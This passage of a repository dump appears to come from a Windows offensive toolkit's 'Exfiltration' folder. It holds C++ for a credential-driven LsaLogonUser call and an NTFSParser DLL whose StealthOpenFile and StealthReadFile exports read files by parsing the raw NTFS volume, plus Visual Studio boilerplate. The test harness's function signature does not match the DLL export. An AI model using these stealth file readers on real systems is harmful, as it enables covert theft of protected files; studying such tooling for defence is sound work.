79 | HANDLE token = NULL;
80 | QUOTA_LIMITS quotaLimits;
81 | NTSTATUS subStatus = 0;
82 |
83 | status = LsaLogonUser(hLSA,
84 | &originName,
85 | RemoteInteractive,
86 | authPackage,
87 | authBuffer,
88 | authBufferSize,
89 | 0,
90 | &tokenSource,
91 | &profileBuffer,
92 | &profileBufferSize,
93 | &loginId,
94 | &token,
95 | "aLimits,
96 | &subStatus);
97 |
98 | if (status != 0)
99 | {
100 | NTSTATUS winError = LsaNtStatusToWinError(status);
101 | cout << "Error calling LsaLogonUser. Error code: " << winError << endl;
102 | return -1;
103 | }
104 |
105 | cout << "Success!" << endl;
106 |
107 | return 1;
108 | }
109 |
110 | //size will be set to the size of the structure created
111 | PVOID CreateNtlmLogonStructure(wstring domain, wstring username, wstring password, DWORD* size)
112 | {
113 | size_t wcharSize = sizeof(wchar_t);
114 |
115 | size_t totalSize = sizeof(MSV1_0_INTERACTIVE_LOGON) + ((domain.length() + username.length() + password.length()) * wcharSize);
116 | MSV1_0_INTERACTIVE_LOGON* ntlmLogon = (PMSV1_0_INTERACTIVE_LOGON)(new BYTE[totalSize]);
117 | size_t offset = sizeof(MSV1_0_INTERACTIVE_LOGON);
118 |
119 | ntlmLogon->MessageType = MsV1_0InteractiveLogon;
120 | offset += WriteUnicodeString(domain, &(ntlmLogon->LogonDomainName), ntlmLogon, offset);
121 | offset += WriteUnicodeString(username, &(ntlmLogon->UserName), ntlmLogon, offset);
122 | offset += WriteUnicodeString(password, &(ntlmLogon->Password), ntlmLogon, offset);
123 |
124 | *size = (DWORD)totalSize; //If the size is bigger than a DWORD, there is a gigantic bug somewhere.
125 | return ntlmLogon;
126 | }
127 |
128 | size_t WriteUnicodeString(wstring str, UNICODE_STRING* uniStr, PVOID baseAddress, size_t offset)
129 | {
130 | const wchar_t* buffer = str.c_str();
131 | size_t size = str.length() * sizeof(wchar_t);
132 | uniStr->Length = (USHORT)size;
133 | uniStr->MaximumLength = (USHORT)size;
134 | uniStr->Buffer = (PWSTR)((UINT_PTR)baseAddress + offset);
135 | memcpy((PVOID)((UINT_PTR)baseAddress + offset), str.c_str(), size);
136 | return size;
137 | }
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/LogonUser/LogonUser.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Debug
10 | x64
11 |
12 |
13 | Release
14 | Win32
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {F9DC2AAF-2213-4D87-9F52-283DA1CC6E18}
23 | Win32Proj
24 | LogonUser
25 |
26 |
27 |
28 | Application
29 | true
30 | v110
31 | Unicode
32 |
33 |
34 | Application
35 | true
36 | v110
37 | Unicode
38 |
39 |
40 | Application
41 | false
42 | v110
43 | true
44 | Unicode
45 |
46 |
47 | Application
48 | false
49 | v110
50 | true
51 | Unicode
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 | true
71 |
72 |
73 | true
74 |
75 |
76 | false
77 |
78 |
79 | false
80 |
81 |
82 |
83 | Use
84 | Level3
85 | Disabled
86 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
87 |
88 |
89 | Console
90 | true
91 | secur32.lib;%(AdditionalDependencies)
92 |
93 |
94 |
95 |
96 | Use
97 | Level3
98 | Disabled
99 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
100 |
101 |
102 | Console
103 | true
104 | secur32.lib;%(AdditionalDependencies)
105 |
106 |
107 |
108 |
109 | Level3
110 | Use
111 | MaxSpeed
112 | true
113 | true
114 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
115 |
116 |
117 | Console
118 | true
119 | true
120 | true
121 |
122 |
123 |
124 |
125 | Level3
126 | Use
127 | MaxSpeed
128 | true
129 | true
130 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
131 |
132 |
133 | Console
134 | true
135 | true
136 | true
137 |
138 |
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
148 |
149 | Create
150 | Create
151 | Create
152 | Create
153 |
154 |
155 |
156 |
157 |
158 |
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/LogonUser/LogonUser.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 |
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/LogonUser/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | CONSOLE APPLICATION : LogonUser Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this LogonUser application for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your LogonUser application.
9 |
10 |
11 | LogonUser.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | LogonUser.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | LogonUser.cpp
25 | This is the main application source file.
26 |
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 |
30 | StdAfx.h, StdAfx.cpp
31 | These files are used to build a precompiled header (PCH) file
32 | named LogonUser.pch and a precompiled types file named StdAfx.obj.
33 |
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 |
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 |
40 | /////////////////////////////////////////////////////////////////////////////
41 |
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/LogonUser/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // LogonUser.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/LogonUser/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 | #include
10 | #include
11 | #include
12 | #include
13 | #include
14 | #include
15 |
16 |
17 |
18 |
19 |
20 | // TODO: reference additional headers your program requires here
21 |
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/LogonUser/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/logon/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | DYNAMIC LINK LIBRARY : logon Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this logon DLL for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your logon application.
9 |
10 |
11 | logon.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | logon.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | logon.cpp
25 | This is the main DLL source file.
26 |
27 | When created, this DLL does not export any symbols. As a result, it
28 | will not produce a .lib file when it is built. If you wish this project
29 | to be a project dependency of some other project, you will either need to
30 | add code to export some symbols from the DLL so that an export library
31 | will be produced, or you can set the Ignore Input Library property to Yes
32 | on the General propert page of the Linker folder in the project's Property
33 | Pages dialog box.
34 |
35 | /////////////////////////////////////////////////////////////////////////////
36 | Other standard files:
37 |
38 | StdAfx.h, StdAfx.cpp
39 | These files are used to build a precompiled header (PCH) file
40 | named logon.pch and a precompiled types file named StdAfx.obj.
41 |
42 | /////////////////////////////////////////////////////////////////////////////
43 | Other notes:
44 |
45 | AppWizard uses "TODO:" comments to indicate parts of the source code you
46 | should add to or customize.
47 |
48 | /////////////////////////////////////////////////////////////////////////////
49 |
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/logon/dllmain.cpp:
--------------------------------------------------------------------------------
1 | // dllmain.cpp : Defines the entry point for the DLL application.
2 | #include "stdafx.h"
3 |
4 | BOOL APIENTRY DllMain( HMODULE hModule,
5 | DWORD ul_reason_for_call,
6 | LPVOID lpReserved
7 | )
8 | {
9 | switch (ul_reason_for_call)
10 | {
11 | case DLL_PROCESS_ATTACH:
12 | case DLL_THREAD_ATTACH:
13 | case DLL_THREAD_DETACH:
14 | case DLL_PROCESS_DETACH:
15 | break;
16 | }
17 | return TRUE;
18 | }
19 |
20 |
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/logon/logon.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 | Source Files
37 |
38 |
39 |
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/logon/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // logon.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/logon/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
11 | // Windows Header Files:
12 | #include "targetver.h"
13 | #include
14 | #include
15 | #include
16 | #include
17 | #include
18 | #include
19 | #include
20 | #include
21 | #include
22 |
23 |
24 |
25 | // TODO: reference additional headers your program requires here
26 |
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/logon/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParser.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 2012
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "NTFSParserDLL", "NTFSParserDLL\NTFSParserDLL.vcxproj", "{5E42B778-F231-4797-B7FD-7D5BCA9738D0}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Debug|x64 = Debug|x64
10 | Release|Win32 = Release|Win32
11 | Release|x64 = Release|x64
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Debug|Win32.ActiveCfg = Debug|Win32
15 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Debug|Win32.Build.0 = Debug|Win32
16 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Debug|x64.ActiveCfg = Debug|x64
17 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Debug|x64.Build.0 = Debug|x64
18 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Release|Win32.ActiveCfg = Release|Win32
19 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Release|Win32.Build.0 = Release|Win32
20 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Release|x64.ActiveCfg = Release|x64
21 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Release|x64.Build.0 = Release|x64
22 | EndGlobalSection
23 | GlobalSection(SolutionProperties) = preSolution
24 | HideSolutionNode = FALSE
25 | EndGlobalSection
26 | EndGlobal
27 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParser/NTFS.h:
--------------------------------------------------------------------------------
1 | /*
2 | * NTFS include files
3 | *
4 | * Copyright(C) 2010 cyb70289
5 | *
6 | * This program/include file is free software; you can redistribute it and/or
7 | * modify it under the terms of the GNU General Public License as published
8 | * by the Free Software Foundation; either version 2 of the License, or
9 | * (at your option) any later version.
10 | *
11 | * This program/include file is distributed in the hope that it will be
12 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty
13 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
14 | * GNU General Public License for more details.
15 | */
16 |
17 | #ifndef __NTFS_H_CYB70289
18 | #define __NTFS_H_CYB70289
19 |
20 | #pragma pack(8)
21 |
22 | #include "NTFS_Common.h"
23 | #include "NTFS_FileRecord.h"
24 | #include "NTFS_Attribute.h"
25 |
26 | #pragma pack()
27 |
28 | #endif
29 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParser/NTFSParser.cpp:
--------------------------------------------------------------------------------
1 | /*
2 | *
3 | * Copyright(C) 2013 Joe Bialek Twitter:@JosephBialek
4 | *
5 | * This program/include file is free software; you can redistribute it and/or
6 | * modify it under the terms of the GNU General Public License as published
7 | * by the Free Software Foundation; either version 2 of the License, or
8 | * (at your option) any later version.
9 | *
10 | * This program/include file is distributed in the hope that it will be
11 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty
12 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
13 | * GNU General Public License for more details.
14 | */
15 | //
16 | // This code uses libraries released under GPLv2(or later) written by cyb70289
17 |
18 | #include "stdafx.h"
19 | #include "NTFS.h"
20 | #include "NTFS_Attribute.h"
21 | #include "NTFS_Common.h"
22 | #include "NTFS_DataType.h"
23 | #include "NTFS_FileRecord.h"
24 |
25 | using namespace std;
26 |
27 | typedef DWORD (CDECL *StealthReadFile_Func)(string, BYTE*, DWORD, ULONGLONG, DWORD*, ULONGLONG*);
28 |
29 | int _tmain(int argc, _TCHAR* argv[])
30 | {
31 | HMODULE parserDLLHandle = LoadLibraryA("NTFSParserDLL.dll");
32 | HANDLE procAddress = GetProcAddress(parserDLLHandle, "StealthReadFile");
33 |
34 | StealthReadFile_Func StealthReadFile = (StealthReadFile_Func)procAddress;
35 |
36 | DWORD buffSize = 1024*1024;
37 | BYTE* buffer = new BYTE[buffSize];
38 | DWORD bytesRead = 0;
39 | ULONGLONG bytesLeft = 0;
40 | DWORD ret = StealthReadFile("c:\\test\\test.txt", buffer, buffSize, 0, &bytesRead, &bytesLeft);
41 |
42 | cout << "Return value: " << ret << endl;
43 |
44 | ofstream myFile("c:\\test\\test2.txt", ios::out | ios::binary);
45 | myFile.write((char*)buffer, bytesRead);
46 |
47 | return 0;
48 | }
49 |
50 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParser/NTFSParser.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 | Header Files
29 |
30 |
31 | Header Files
32 |
33 |
34 | Header Files
35 |
36 |
37 | Header Files
38 |
39 |
40 | Header Files
41 |
42 |
43 |
44 |
45 | Source Files
46 |
47 |
48 | Source Files
49 |
50 |
51 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParser/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | CONSOLE APPLICATION : NTFSParser Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this NTFSParser application for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your NTFSParser application.
9 |
10 |
11 | NTFSParser.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | NTFSParser.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | NTFSParser.cpp
25 | This is the main application source file.
26 |
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 |
30 | StdAfx.h, StdAfx.cpp
31 | These files are used to build a precompiled header (PCH) file
32 | named NTFSParser.pch and a precompiled types file named StdAfx.obj.
33 |
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 |
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 |
40 | /////////////////////////////////////////////////////////////////////////////
41 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParser/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // NTFSParser.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParser/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #include
11 | #include
12 | #include
13 | #include
14 | #include
15 |
16 |
17 | // TODO: reference additional headers your program requires here
18 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParser/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParserDLL/NTFS.h:
--------------------------------------------------------------------------------
1 | /*
2 | * NTFS include files
3 | *
4 | * Copyright(C) 2010 cyb70289
5 | *
6 | * This program/include file is free software; you can redistribute it and/or
7 | * modify it under the terms of the GNU General Public License as published
8 | * by the Free Software Foundation; either version 2 of the License, or
9 | * (at your option) any later version.
10 | *
11 | * This program/include file is distributed in the hope that it will be
12 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty
13 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
14 | * GNU General Public License for more details.
15 | */
16 |
17 | #ifndef __NTFS_H_CYB70289
18 | #define __NTFS_H_CYB70289
19 |
20 | #pragma pack(8)
21 |
22 | #include "NTFS_Common.h"
23 | #include "NTFS_FileRecord.h"
24 | #include "NTFS_Attribute.h"
25 |
26 | #pragma pack()
27 |
28 | #endif
29 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParserDLL/NTFSParserDLL.cpp:
--------------------------------------------------------------------------------
1 | /*
2 | *
3 | * Copyright(C) 2013 Joe Bialek Twitter:@JosephBialek
4 | *
5 | * This program/include file is free software; you can redistribute it and/or
6 | * modify it under the terms of the GNU General Public License as published
7 | * by the Free Software Foundation; either version 2 of the License, or
8 | * (at your option) any later version.
9 | *
10 | * This program/include file is distributed in the hope that it will be
11 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty
12 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
13 | * GNU General Public License for more details.
14 | */
15 | //
16 | // This code uses libraries released under GPLv2(or later) written by cyb70289
17 |
18 | #include "stdafx.h"
19 | #include "NTFS.h"
20 | #include "NTFS_DataType.h"
21 |
22 | using namespace std;
23 |
24 | struct FileInfo_t
25 | {
26 | CNTFSVolume* volume;
27 | CFileRecord* fileRecord;
28 | CIndexEntry* indexEntry;
29 | CAttrBase* data;
30 | };
31 |
32 | extern "C" HANDLE __declspec(dllexport) StealthOpenFile(char* filePathCStr)
33 | {
34 | FileInfo_t* fileInfo = new FileInfo_t;
35 |
36 | string filePath = string(filePathCStr);
37 | _TCHAR volumeName = filePath.at(0);
38 |
39 | fileInfo->volume = new CNTFSVolume(volumeName);
40 | if (!fileInfo->volume->IsVolumeOK())
41 | {
42 | return NULL;
43 | }
44 |
45 | //Parse root directory
46 | fileInfo->fileRecord = new CFileRecord(fileInfo->volume);
47 | fileInfo->fileRecord->SetAttrMask(MASK_INDEX_ROOT | MASK_INDEX_ALLOCATION);
48 |
49 | if (!fileInfo->fileRecord->ParseFileRecord(MFT_IDX_ROOT))
50 | {
51 | return NULL;
52 | }
53 | if (!fileInfo->fileRecord->ParseAttrs())
54 | {
55 | return NULL;
56 | }
57 |
58 | //Find subdirectory
59 | fileInfo->indexEntry = new CIndexEntry;
60 | int dirs = filePath.find(_T('\\'), 0);
61 | int dire = filePath.find(_T('\\'), dirs+1);
62 |
63 | while (dire != string::npos)
64 | {
65 | string pathname = filePath.substr(dirs+1, dire-dirs-1);
66 | const _TCHAR* pathnameCStr = (const _TCHAR*)pathname.c_str();
67 | if (fileInfo->fileRecord->FindSubEntry(pathnameCStr, *(fileInfo->indexEntry)))
68 | {
69 | if (!fileInfo->fileRecord->ParseFileRecord(fileInfo->indexEntry->GetFileReference()))
70 | {
71 | return NULL;
72 | }
73 |
74 | if (!fileInfo->fileRecord->ParseAttrs())
75 | {
76 | if (fileInfo->fileRecord->IsCompressed())
77 | {
78 | return NULL;
79 | }
80 | else if (fileInfo->fileRecord->IsEncrypted())
81 | {
82 | return NULL;
83 | }
84 | else
85 | {
86 | return NULL;
87 | }
88 | }
89 | }
90 | else
91 | {
92 | return NULL;
93 | }
94 |
95 |
96 | dirs = dire;
97 | dire = filePath.find(_T('\\'), dirs+1);
98 | }
99 |
100 | string fileName = filePath.substr(dirs+1, filePath.size()-1);
101 | const _TCHAR* fileNameCStr = (const _TCHAR*)fileName.c_str();
102 | if (fileInfo->fileRecord->FindSubEntry(fileNameCStr, *(fileInfo->indexEntry)))
103 | {
104 | if (!fileInfo->fileRecord->ParseFileRecord(fileInfo->indexEntry->GetFileReference()))
105 | {
106 | return NULL;
107 | }
108 |
109 | fileInfo->fileRecord->SetAttrMask(MASK_DATA);
110 | if (!fileInfo->fileRecord->ParseAttrs())
111 | {
112 | return NULL;
113 | }
114 |
115 | fileInfo->data = (CAttrBase*)fileInfo->fileRecord->FindStream();
116 |
117 | return fileInfo;
118 | }
119 |
120 | return NULL;
121 | }
122 |
123 |
124 | extern "C" DWORD __declspec(dllexport) StealthReadFile(FileInfo_t* fileInfo, BYTE* buffer, DWORD bufferSize, ULONGLONG offset, DWORD* bytesRead, ULONGLONG* dataRemaining)
125 | {
126 |
127 | if (fileInfo->data)
128 | {
129 | ULONGLONG dataLength = (ULONGLONG)fileInfo->data->GetDataSize();
130 | ULONGLONG fullDataLength = dataLength;
131 |
132 | dataLength = dataLength - offset;
133 | if (dataLength > bufferSize)
134 | {
135 | dataLength = bufferSize;
136 | }
137 | if (dataLength > MAXUINT32)
138 | {
139 | return 1;
140 | }
141 |
142 | DWORD len;
143 | if (fileInfo->data->ReadData(offset, buffer, dataLength, &len) && len == dataLength)
144 | {
145 | *bytesRead = len;
146 | *dataRemaining = fullDataLength - len - offset;
147 | return 0; //Success
148 | }
149 | return 3;
150 | }
151 | return 2;
152 | }
153 |
154 |
155 | extern "C" void __declspec(dllexport) StealthCloseFile(FileInfo_t* fileInfo)
156 | {
157 | delete (fileInfo->data);
158 | delete (fileInfo->indexEntry);
159 | delete (fileInfo->volume);
160 | delete fileInfo;
161 | }
162 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParserDLL/NTFSParserDLL.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 | Source Files
37 |
38 |
39 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParserDLL/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | DYNAMIC LINK LIBRARY : NTFSParserDLL Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this NTFSParserDLL DLL for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your NTFSParserDLL application.
9 |
10 |
11 | NTFSParserDLL.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | NTFSParserDLL.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | NTFSParserDLL.cpp
25 | This is the main DLL source file.
26 |
27 | When created, this DLL does not export any symbols. As a result, it
28 | will not produce a .lib file when it is built. If you wish this project
29 | to be a project dependency of some other project, you will either need to
30 | add code to export some symbols from the DLL so that an export library
31 | will be produced, or you can set the Ignore Input Library property to Yes
32 | on the General propert page of the Linker folder in the project's Property
33 | Pages dialog box.
34 |
35 | /////////////////////////////////////////////////////////////////////////////
36 | Other standard files:
37 |
38 | StdAfx.h, StdAfx.cpp
39 | These files are used to build a precompiled header (PCH) file
40 | named NTFSParserDLL.pch and a precompiled types file named StdAfx.obj.
41 |
42 | /////////////////////////////////////////////////////////////////////////////
43 | Other notes:
44 |
45 | AppWizard uses "TODO:" comments to indicate parts of the source code you
46 | should add to or customize.
47 |
48 | /////////////////////////////////////////////////////////////////////////////
49 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParserDLL/dllmain.cpp:
--------------------------------------------------------------------------------
1 | /*
2 | *
3 | * Copyright(C) 2013 Joe Bialek Twitter:@JosephBialek
4 | *
5 | * This program/include file is free software; you can redistribute it and/or
6 | * modify it under the terms of the GNU General Public License as published
7 | * by the Free Software Foundation; either version 2 of the License, or
8 | * (at your option) any later version.
9 | *
10 | * This program/include file is distributed in the hope that it will be
11 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty
12 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
13 | * GNU General Public License for more details.
14 | */
15 | //
16 | // This code uses libraries released under GPLv2(or later) written by cyb70289
17 |
18 | // dllmain.cpp : Defines the entry point for the DLL application.
19 | #include "stdafx.h"
20 |
21 | BOOL APIENTRY DllMain( HMODULE hModule,
22 | DWORD ul_reason_for_call,
